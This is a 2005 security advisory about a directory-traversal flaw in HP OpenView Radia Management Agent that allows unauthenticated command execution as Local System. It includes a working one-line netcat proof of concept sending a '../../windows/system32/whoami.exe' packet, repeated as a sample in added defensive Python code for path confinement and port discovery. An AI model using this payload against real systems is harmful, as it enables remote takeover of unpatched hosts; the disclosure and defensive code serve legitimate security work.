[VulnWatch] HP OpenView Radia Management Agent remote command execution

Subject: [VulnWatch] HP OpenView Radia Management Agent remote command execution via directory traversal
Date: Thu, 28 Jul 2005 10:19:56 +0100
NGSSoftware Insight Security Research Advisory

Name: HP OpenView Radia Management Agent remote command execution via
directory traversal
Systems Affected: HP OpenView Radia Management Portal versions 2.x and
1.x running Radia Management Agent
Severity: High
Vendor URL: http://www.hp.com/
Authors: David Morgan      davidm@ngssoftware.com
         Dominic Beecher   dominic@ngssoftware.com
Date of initial advisory:  28 April 2005
Date of full advisory:     28 July 2005

Description
-----------

The Radia Management Agent is part of HP's OpenView Radia suite of
software. It runs as a Windows service (RMA) with Local System
privileges. The RMA service listens on a TCP port that is not fixed. In
the example below, the service was listening on TCP port 1065.

By connecting to the TCP port and sending a crafted packet, it is
possible to traverse out of C:\Program Files\Novadigm (the apparent
working directory) and run any executable that is located on the same
logical disk partition, in this case the C: drive.

Details
-------

C:\>sc queryex rma

SERVICE_NAME: rma
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 1032
        FLAGS              :

C:\>netstat -ano

Active Connections

  Proto  Local Address      Foreign Address        State           PID
  TCP    0.0.0.0:1065       0.0.0.0:0              LISTENING       1032
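Because the RMA port is not fixed, an inventory or firewall rule cannot simply hard-code 1065; the two commands above have to be correlated (service -> PID -> listening socket). The following is an added example, not part of the NGSSoftware advisory, that does that correlation over constructed copies of the `sc queryex` and `netstat -ano` output (the extra sockets are invented to show that loopback-only and ESTABLISHED rows are filtered out):

```python
import re
from typing import List, Optional, Tuple

# Constructed sample output, modelled on the `sc queryex rma` and `netstat -ano`
# transcripts in the advisory; not captured from a real host.
SC_QUERYEX_OUTPUT = """\
SERVICE_NAME: rma
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 1032
        FLAGS              :
"""

NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address      Foreign Address        State           PID
  TCP    0.0.0.0:135        0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:1065       0.0.0.0:0              LISTENING       1032
  TCP    127.0.0.1:1066     0.0.0.0:0              LISTENING       1032
  TCP    10.0.0.5:1070      10.0.0.9:445           ESTABLISHED     1032
  UDP    0.0.0.0:500        *:*                                    700
"""


def service_pid(sc_output: str) -> Optional[int]:
    """Pull the PID field out of `sc queryex <service>` output."""
    match = re.search(r"^\s*PID\s*:\s*(\d+)", sc_output, re.MULTILINE)
    return int(match.group(1)) if match else None


def listening_sockets(netstat_output: str, pid: int) -> List[Tuple[str, int]]:
    """Return (bind_address, port) for every LISTENING TCP socket owned by pid.

    UDP rows in `netstat -ano` have no State column (four fields), so the
    field-count check skips them; header lines are skipped the same way.
    """
    sockets = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP":
            continue
        _proto, local, _foreign, state, owner = fields
        if state != "LISTENING" or not owner.isdigit() or int(owner) != pid:
            continue
        address, port = local.rsplit(":", 1)
        sockets.append((address, int(port)))
    return sockets


def exposed_ports(netstat_output: str, pid: int) -> List[int]:
    """Ports reachable from the network: LISTENING sockets not bound to loopback."""
    return sorted(
        port for address, port in listening_sockets(netstat_output, pid)
        if not address.startswith("127.") and address != "[::1]"
    )


def rma_exposed_ports(sc_output: str, netstat_output: str) -> List[int]:
    """Tie the two outputs together: service -> PID -> network-reachable ports."""
    pid = service_pid(sc_output)
    if pid is None:
        return []
    return exposed_ports(netstat_output, pid)


if __name__ == "__main__":
    print("RMA listens on", rma_exposed_ports(SC_QUERYEX_OUTPUT, NETSTAT_OUTPUT))
```

On a live host the two strings would be replaced by the captured output of the same commands; the point is that only the 0.0.0.0-bound socket of PID 1032 survives the filter, which is the one a host firewall rule or an IDS port filter needs to cover until the vendor patch is applied.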

bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v xx.xx.xx.xx 1065

host.domain [xx.xx.xx.xx] 1065 (?) open
nt authority\system

The output from whoami.exe clearly demonstrates that it is possible for
a remote attacker to execute arbitrary system commands with Local System
privileges without authentication.
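The root cause is that the service takes the path out of the request and runs it relative to its working directory without confining it to that directory. The following is an added example, not code from NGSSoftware or HP, of the check a hardened service (or a protocol-aware filter in front of it) would apply. It assumes the request framing visible in the single packet above (three NUL bytes, a path, a terminating NUL) and the working directory named in the description; the sample requests are constructed:

```python
from pathlib import PureWindowsPath

# Working directory the advisory names for the service; assumed here, not taken
# from any HP source.
BASE_DIR = PureWindowsPath(r"C:\Program Files\Novadigm")


def parse_rma_request(packet: bytes) -> str:
    """Extract the requested path from a request of the shape shown in the
    advisory: three NUL bytes, a path, a terminating NUL. That framing is an
    assumption drawn from the single example packet; anything else is rejected."""
    if len(packet) < 5 or packet[:3] != b"\x00\x00\x00" or packet[-1:] != b"\x00":
        raise ValueError("malformed request framing")
    body = packet[3:-1]
    if b"\x00" in body:
        raise ValueError("embedded NUL in path")
    try:
        return body.decode("ascii")
    except UnicodeDecodeError:
        raise ValueError("non-ASCII bytes in path")


def confine_to_base(base: PureWindowsPath, requested: str) -> PureWindowsPath:
    """Hardened version of the lookup the service should have done: treat the
    request as relative to base and refuse anything that would leave it."""
    candidate = PureWindowsPath(requested)
    # A drive letter or a leading separator would ignore the base entirely.
    if candidate.drive or candidate.root:
        raise PermissionError("absolute path rejected")
    # Lexically collapse '.' and '..'; PureWindowsPath already treats '/' and '\' alike.
    parts = []
    for part in candidate.parts:
        if part == ".":
            continue
        if part == "..":
            if not parts:
                raise PermissionError("path escapes base directory")
            parts.pop()
        else:
            parts.append(part)
    if not parts:
        raise ValueError("no file named")
    resolved = base.joinpath(*parts)
    # Belt and braces: the result must still sit under base.
    if base not in resolved.parents:
        raise PermissionError("path escapes base directory")
    return resolved


def resolve_request(packet: bytes) -> PureWindowsPath:
    """Parse and confine in one step; raises on anything that must not run."""
    return confine_to_base(BASE_DIR, parse_rma_request(packet))


def classify_request(packet: bytes) -> str:
    """Log label for a request: 'ok', 'malformed', or 'traversal'."""
    try:
        resolve_request(packet)
        return "ok"
    except ValueError:
        return "malformed"
    except PermissionError:
        return "traversal"


# Constructed sample requests: one in-tree lookup, the advisory's traversal
# payload, an absolute path, and a request with broken framing.
SAMPLE_REQUESTS = {
    "in_tree": b"\x00\x00\x00bin\\agent.exe\x00",
    "traversal": b"\x00\x00\x00../../windows/system32/whoami.exe\x00",
    "absolute": b"\x00\x00\x00C:\\windows\\system32\\whoami.exe\x00",
    "broken": b"\x00\x00agent.exe",
}

if __name__ == "__main__":
    for name, packet in SAMPLE_REQUESTS.items():
        print(f"{name:10s} -> {classify_request(packet)}")
```

The lexical check is the minimum, not the whole fix: on Windows a real implementation should also canonicalise through the OS (junctions and 8.3 short names can defeat string-level checks), and a service that only ever needs to launch a handful of its own executables is better served by an allow-list of file names than by any path validation at all. The `classify_request` labels are what a defender would log or alert on while waiting for the vendor patch.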

Fix Information
---------------

HP has developed a patch to fix the problem. More information can be
found in their security bulletin HPSBMA01138:

http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01138

About NGSSoftware
-----------------

NGSSoftware design, research and develop intelligent, advanced
application security assessment scanners. Based in the United Kingdom,
NGSSoftware have offices in the South of London and the East Coast of
Scotland. NGSSoftware's sister company, NGSConsulting, offers best of
breed security consulting services, specialising in application, host
and network security assessments.

http://www.ngssoftware.com/

Tel: +44 (0)20 8401 0070
Fax: +44 (0)20 8401 0076

enquiries@ngssoftware.com
